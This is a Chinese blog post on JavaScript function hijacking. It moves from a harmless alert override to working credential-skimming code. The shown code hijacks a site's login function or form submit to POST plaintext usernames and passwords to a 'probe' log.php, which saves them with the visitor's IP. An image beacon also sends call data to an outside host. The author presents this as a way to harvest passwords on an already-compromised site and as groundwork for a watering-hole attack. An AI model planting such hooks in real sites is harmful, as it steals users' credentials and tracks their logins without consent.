JavaScript 函数劫持攻击原理

wholesome

JavaScript 函数劫持攻击原理

JavaScript 函数劫持并不是什么新颖的技术了。这两天在和同事吹牛的过程中提到了这个，就简单地再回顾回顾，以及假想在攻防的运用场景。

JavaScript 函数劫持（javascript hijacking）简介

一个简单的示例如下，主要逻辑就是，用变量 _alert保存原函数 alert，然后重写 alert 函数，在重写的函数最后调用原函数。这样得到的一个效果就是调用 alert 的时候，可以往 alert 中加入其它操作。比如如下代码中进行一个赋值。

1. <script type="text/javascript">
   
2.   var _alert = alert;
   
3.   alert = function(){
   
4.     var str = "啥也不是";
   
5.     _alert(str);
   
6.   }
   
7.   alert();
   
8. </script>

复制代码

日志记录

这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的操作，那么就可以在比较隐蔽的执行一些猥琐的操作。比如

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通过 Hook alert 函数来记录调用情况，或者弹一些警告信息，这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上，没准就是日后的呈堂证供。

1. <script type="text/javascript">  
   
2.   function log(s) {  
   
3.   var img = new Image();  
   
4.   img.style.width = img.style.height = 0;  
   
5.   img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);  
   
6.   }  
   
7.   var _alert = alert;  
   
8.   window.alert = function(s) {  
   
9.   log(alert.caller);  
   
10.   _alert(s);  
    
11.   }  
    
12. </script>

复制代码

探针

在某些场景下，比如：已有权限，但是数据库中密码是加密的，无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例：

onclick 事件会调用 login 函数发送请求包：

1. 
   
2. 
   
3.     <form id="form1">
   
4.             <input type="text" id="username" name="username"/><br>
   
5.             <input type="password" id = "password" name="password"/><br>
   
6.             <button id="submit" onclick="login()">submit</button><br>
   
7.         </form>
   
8.         <script>
   
9.             function login(){
   
10.                 var username = document.getElementById("username").value;
    
11.                 var password = document.getElementById("password").value;
    
12.                 $.ajax({
    
13.                     url:"login.php",
    
14.                     type:"POST",
    
15.                     data:{
    
16.                         "username":username,
    
17.                         "password":password
    
18.                     },
    
19.                     success:function(){
    
20.                         alert(1);
    
21.                     },
    
22.                     error:function(){
    
23.                         alert("error");
    
24.                     }
    
25.                 });
    
26. 
    
27.             }
    
28. </script>

复制代码

可以劫持 login 函数，在发送登陆请求前，先发到探针文件中做一些记录帐号密码等操作。

1. var _login=login;
   
2.             login = function (){
   
3.                 var username = document.getElementById("username").value;
   
4.                 var password = document.getElementById("password").value;
   
5.                 $.ajax({
   
6.                     url:"log.php",
   
7.                     type:"POST",
   
8.                     data:{
   
9.                         "username":username,
   
10.                         "password":password
    
11.                     },
    
12.                     success:console.log("1"),
    
13.                     error:function(){
    
14.                         alert("error");
    
15.                     }
    
16.                 });
    
17.                
    
18.             }

复制代码

log.php 的内容如下：

1. <?php
   
2. $username = $_POST["username"];
   
3. $password = $_POST["password"];
   
4. $ip = $_SERVER['REMOTE_ADDR'];
   
5. file_put_contents("./log.txt",$username." ".$password." ".$ip);

复制代码

也许在实际中更常见的表单形式应该是下面这种。

1. <form id="form1" method="POST" action=“login.php”>
   
2.   <input type="text" id="username" name="username"/><br>
   
3.   <input type="password" id = "password" name="password"/><br>
   
4.   <input type="submit" id="submit" name="submit"/><br>
   
5. </form>

复制代码

这种表单也可以通过小小的改动，很简单的记录到信息,下面使用的是 onsubmit 事件，用如下方式即可：

1. <script src="http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"> </script>
   
2.     <body>
   
3.         <form id="form1" method="POST" action=“login.php” onsubmit="return _login()">
   
4.             <input type="text" id="username" name="username"/><br>
   
5.             <input type="password" id = "password" name="password"/><br>
   
6.             <input type="submit" id="submit" name="submit"/><br>
   
7.         </form>
   
8.         
   
9.             <script>
   
10.                 function _login(){
    
11.                     var username = document.getElementById("username").value;
    
12.                     var password = document.getElementById("password").value;
    
13.                     $.ajax({
    
14.                         url:"log.php",
    
15.                         type:"POST",
    
16.                         data:{
    
17.                             "username":username,
    
18.                             "password":password
    
19.                         },
    
20.                         success:true,
    
21.                         error:true
    
22.                     });
    
23.                 }
    
24. </script>

复制代码

不仅可以记录密码，还可以结合前面提到的记录日志，来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集，根据收集的信息制定具体的水坑方案。顺便吐槽一句IE 辣鸡。